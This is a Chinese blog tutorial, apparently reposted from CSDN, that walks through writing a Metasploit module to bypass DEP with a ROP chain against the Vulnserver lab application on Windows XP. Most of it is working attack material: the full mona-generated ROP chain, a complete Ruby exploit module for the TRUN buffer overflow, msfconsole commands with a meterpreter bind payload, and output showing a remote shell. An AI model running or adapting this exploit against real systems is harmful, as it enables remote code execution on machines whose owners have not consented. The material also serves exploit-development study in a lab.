渗透之——使用Metasploit编写绕过DEP渗透模块
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86522445
攻击机 Kali 192.168.109.137
靶机 WinXP 192.168.109.141 (也可为其他Win系统,设置为DEP保护)
应用程序 Vulnserver(可以到链接: https://download.csdn.net/download/l1028386804/10921905 下载)
1.将靶机设置DEP保护
数据执行保护(Data Execution Prevention,DEP)是一种将特定内存区域标记为不可执行的保护机制,这种机制会导致我们在渗透过程中无法执行ShellCode。因此,即使我们可以改写EIP寄存器中的内容并成功地将ESP指向了ShellCode的起始地址,也无法执行攻击载荷。这是因为DEP的存在组织了内存中可写区域(例如栈和堆)中数据的执行。在这种情况下,我们必须使用可执行区域中的现存指令实现预期的功能——可以通过将所有的可执行指令放置成一个可以让跳转跳到ShellCode的顺序来实现这一目的。
绕过DEP的技术被称为返回导向编程(Return Oriented Programming,ROP)技术,它不同于通过覆盖改写EIP内容,并跳转到ShellCode栈溢出的普通方法。当DEP启用之后,我们将无法使用这种技术,因为栈中的数据是不能执行的。因此我们不再跳转到ShellCode,而是调用第一个ROP指令片段(gadget)。这些指令片段共同构成一个链式结构,一个指令片段会返回下一个指令片段,而不执行栈中的任何代码。
具体操作如下:
右键"我的电脑"->属性->高级->性能设置->数据执行保存->选择“为除下列选定程序之外的所有程序和服务启用DEP (U)”->确定
2.开启Vlunserver监听
在靶机的命令行中切换到vlunserver.exe所在的目录,执行如下命令
vlunserver.exe 9999
监听9999端口
3.开启ImmunityDebugger
4.将Vulnserver进程加载到ImmunityDebugger
依次选择ImmunityDebugger的File->Attach
显示靶机所有进程的信息
我们选中Vulnserver进程并单击右下角的Attach按钮
显示Vulnserver进程的运行信息
此时看到Vulnserver进程处于暂停状态,我们需要点击ImmunityDebugger的Play按钮
此时,看到Vulnserver处于运行状态
5.查找Vulnserver运行时加载的所有DLL信息
在ImmunityDebugger的命令行输入如下命令:
!mona modules
6.将msvcrt.dll上传到Kali的/root目录下
这里我们将靶机的C:\Windows\system32\msvcrt.dll上传到Kali的/root目录下。
7.查找ROP指令片段
这里,我们使用到的工具是Metasploit的msfrop,在Kali的命令行输入:
msfconsole
msfrop -v -s "pop cex" /root/msvcrt.dll
输出太多,这里只截取一部分:
8.创建ROP链
在ImmunityDebugger命令行输入如下命令:
!mona rop -m *.dll -cp nonull
执行后会在ImmunityDebugger安装目录下生成一个rop_chains.txt文件
我们打开rop_chains.txt文件,找到如下代码片段:
def create_rop_chain()# rop chain generated with mona.py - www.corelan.berop_gadgets = [0x77bfc038, # POP ECX # RETN [msvcrt.dll] 0x6250609c, # ptr to &VirtualProtect() [IAT essfunc.dll]0x77d5373d, # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 0x7c96d192, # XCHG EAX,ESI # RETN [ntdll.dll] 0x77c11c54, # POP EBP # RETN [msvcrt.dll] 0x625011bb, # & jmp esp [essfunc.dll]0x77c04fcd, # POP EAX # RETN [msvcrt.dll] 0xfffffdff, # Value to negate, will become 0x000002010x77e6d222, # NEG EAX # RETN [RPCRT4.dll] 0x77dc560a, # XCHG EAX,EBX # RETN [ADVAPI32.dll] 0x77f01564, # POP EAX # RETN [GDI32.dll] 0xffffffc0, # Value to negate, will become 0x000000400x77e6d222, # NEG EAX # RETN [RPCRT4.dll] 0x77ef24c8, # XCHG EAX,EDX # RETN [GDI32.dll] 0x77c0eb4f, # POP ECX # RETN [msvcrt.dll] 0x7c99f17e, # &Writable location [ntdll.dll]0x77c17641, # POP EDI # RETN [msvcrt.dll] 0x77e6d224, # RETN (ROP NOP) [RPCRT4.dll]0x77c04fcd, # POP EAX # RETN [msvcrt.dll] 0x90909090, # nop0x60fe4479, # PUSHAD # RETN [hnetcfg.dll] ].flatten.pack("V*")return rop_gadgetsend
之后,将这段代码拷贝到我们自己编写的渗透模块中。
9.编写绕过DEP的Metasploit模块脚本dep_attack_by_binghe.rb
不多说,直接上代码:
##
# Author 冰河
# Date 2019-01-16
# Description Metasploit绕过DEP
##require 'msf/core'
class Metasploit3 < Msf::Exploit::RemoteRank = NormalRankinginclude Msf::Exploit::Remote::Tcpdef initialize(info = {})super(update_info(info,'Name' => 'DEP Bypass Exploit','Description' => %q{DEP Bypass Using ROP Chains Example Module},'Platform' => 'Windows','Author' => ['binghe'],'Payload' =>{'space' => 312,'BadChars' => "\x00"},'Targets' => [['Windows XP', {'Offset' => 2006}]],'DisclosureDate' => '2019-01-16'))register_options([Opt::RPORT(9999)],self.class)enddef create_rop_chain()# rop chain generated with mona.py - www.corelan.berop_gadgets = [0x77bfc038, # POP ECX # RETN [msvcrt.dll] 0x6250609c, # ptr to &VirtualProtect() [IAT essfunc.dll]0x77d5373d, # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 0x7c96d192, # XCHG EAX,ESI # RETN [ntdll.dll] 0x77c11c54, # POP EBP # RETN [msvcrt.dll] 0x625011bb, # & jmp esp [essfunc.dll]0x77c04fcd, # POP EAX # RETN [msvcrt.dll] 0xfffffdff, # Value to negate, will become 0x000002010x77e6d222, # NEG EAX # RETN [RPCRT4.dll] 0x77dc560a, # XCHG EAX,EBX # RETN [ADVAPI32.dll] 0x77f01564, # POP EAX # RETN [GDI32.dll] 0xffffffc0, # Value to negate, will become 0x000000400x77e6d222, # NEG EAX # RETN [RPCRT4.dll] 0x77ef24c8, # XCHG EAX,EDX # RETN [GDI32.dll] 0x77c0eb4f, # POP ECX # RETN [msvcrt.dll] 0x7c99f17e, # &Writable location [ntdll.dll]0x77c17641, # POP EDI # RETN [msvcrt.dll] 0x77e6d224, # RETN (ROP NOP) [RPCRT4.dll]0x77c04fcd, # POP EAX # RETN [msvcrt.dll] 0x90909090, # nop0x60fe4479, # PUSHAD # RETN [hnetcfg.dll] ].flatten.pack("V*")return rop_gadgetsenddef exploitconnectrop_chain = create_rop_chain()junk = rand_text_alpha_upper(target['Offset'])buf = "TRUN ." + junk + rop_chain + make_nops(16) + payload.encoded + '\r\n'sock.put(buf)handlerdisconnectendend
其中,def create_rop_chain()方法就是从第8步创建的rop_chains.txt文件中复制来的。
10.上传脚本dep_attack_by_binghe.rb
将脚本dep_attack_by_binghe.rb上传到Kali的/usr/share/metasploit-framework/modules/exploits/windows/masteringmetasploit目录下。
11.关闭ImmunityDebugger重新启动Vulnserver
在靶机上关闭ImmunityDebugger并重新启动Vulnserver。
12.在Kali上执行
msfconsole
use exploit/windows/masteringmetasploit/dep_attack_by_binghe
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.109.141
show options
exploit
ifconfig
具体操作如下:
msf > use exploit/windows/masteringmetasploit/dep_attack_by_binghe
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) > set RHOST 192.168.109.141
RHOST => 192.168.109.141
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) > show optionsModule options (exploit/windows/masteringmetasploit/dep_attack_by_binghe):Name Current Setting Required Description---- --------------- -------- -----------RHOST 192.168.109.141 yes The target addressRPORT 9999 yes The target port (TCP)Payload options (windows/meterpreter/bind_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LPORT 4444 yes The listen portRHOST 192.168.109.141 no The target addressExploit target:Id Name-- ----0 Windows XPmsf exploit(windows/masteringmetasploit/dep_attack_by_binghe) > exploit[*] Started bind TCP handler against 192.168.109.141:4444
[*] Sending stage (179779 bytes) to 192.168.109.141meterpreter > ifconfigInterface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1Interface 65539
============
Name : VMware Accelerated AMD PCNet Adapter
Hardware MAC : 00:0c:29:5d:8e:d4
MTU : 1500
IPv4 Address : 192.168.109.141
IPv4 Netmask : 255.255.255.0Interface 65540
============
Name : Bluetooth �)%
Hardware MAC : 3c:a0:67:1a:fe:b4
MTU : 1500meterpreter >
成功拿到Meterpreter的Shell。所以,设置系统的DEP保护,对我们来说并没有什么卵用。
渗透之——使用Metasploit编写绕过DEP渗透模块相关推荐
- [系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- 渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
白嫖 :https://zhuanlan.zhihu.com/p/449836479 :http://t.zoukankan.com/hxlinux-p-15787814.html :https:// ...
- 【关注观星公众号】渗透系列之POC编写之刷分大法
一.前言:POC&EXP 什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数 ...
- 26学习渗透测试工具 Metasploit 的基本用法,包括漏洞扫描、攻击模块
Metasploit是一款广泛使用的渗透测试工具,它提供了大量的漏洞扫描.攻击模块和负载等,可以用于评估系统的安全性.下面是Metasploit的基本用法教程,包括漏洞扫描和攻击模块的使用. 漏洞扫描 ...
- 【愚公系列】2023年05月 网络安全高级班 079.Kali LinuxMetasploit渗透测试(Metasploit漏洞利用阶段)
文章目录 前言 一.Metasploit实战 1.漏洞利用阶段 1.1 网络服务攻击 1.1.1 MS12-020(Windows服务) 1.1.2 MS08-067(Windows服务) 1.1.3 ...
- 内网渗透-Metasploit之——基本后渗透命令
Metasploit之--基本后渗透命令 文章目录 Metasploit之--基本后渗透命令 前言 1.帮助菜单 2.后渗透命令 3.机器ID和UUID命令 4.通信信道的操作 5.获取用户名和进程信 ...
- 【愚公系列】2023年05月 网络安全高级班 077.Kali LinuxMetasploit渗透测试(Metasploit介绍)
文章目录 一.Metasploit介绍 1.什么是Metasploit 2.Metasploit的组成 3.Metasploit的基本使用流程 二.基本渗透测试流程 1.攻击流程 2.渗透测试工具介绍 ...
- [网络安全自学篇] 五十五.Windows系统安全之构建ROP链绕过DEP及原理详解
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或 ...
- 利用WPN与ROP绕过DEP保护机制
利用WPN与ROP绕过DEP保护机制 作者:Sud0 译者:riusksk (泉哥:http://riusksk.blogbus.com) 前言 对于本教程,假设读者具备以下条件: 1. 在电脑拥有各 ...
最新文章
- R语言使用xgboost构建回归模型:vtreat包为xgboost回归模型进行数据预处理(缺失值填充、缺失值标识、离散变量独热onehot编码)、构建出生体重的xgboost模型回归模型
- Python 进阶_闭包 装饰器
- 【C++】 C++标准模板库(一) Vector
- 这么简单的bug,你改了2天?
- php 获取mac地址栏,php 获取网卡物理(MAC)地址的实现方法
- 微信小程序自带地图_微信小程序之map地图
- 3、electron打包生成exe文件
- nginx+Git 404 error 错误处理
- paip.关于动画特效原理 html js 框架总结
- 计算机二级C语言程序设计 第一章 程序设计基本概念
- CSS font-family 属性值大全
- 重装系统(用U盘+wepe)
- java前后端分离(增删查改)
- python requests爬网页加速
- 我市“一卡通”被授予国家金卡工程优秀应用成果奖
- 《全面解读IPTV生态链》-转自CSDN
- 如何在 Ubuntu 上配置 ROS和LPMS IMU传感器
- python 文本文件中去重复
- AUTOSAR MCAL解析: ADC
- 磨金石教育分享||想转行学习插画,应该怎么做,需要什么基础?
热门文章
- 三分钟简单阐释计算机发展史,致写文案的你:三分钟快速看完这本书的精髓
- Opencv 提取水平 垂直线,去除杂线,提取对象
- 微信小程序 诡异的异步调用问题,函数执行结果与预想不一致
- 这5个免费音效素材网站,你一定要收藏好~
- 出国旅游也能用微信买单了
- 解决nodemon : 无法加载文件 C:\Users\admin\AppData\Roaming\npm\nodemon.ps1
- 【已更新】万能门店小程序独立版V5.1二开完整版 无限DIY+不限制小程序生成数量+数10款插件
- 2020011030王紫薇
- 【梁小国】教你怎么签自己的名字
- linux上tftp上传文件失败,Linux下tftp上传文件失败的几条原因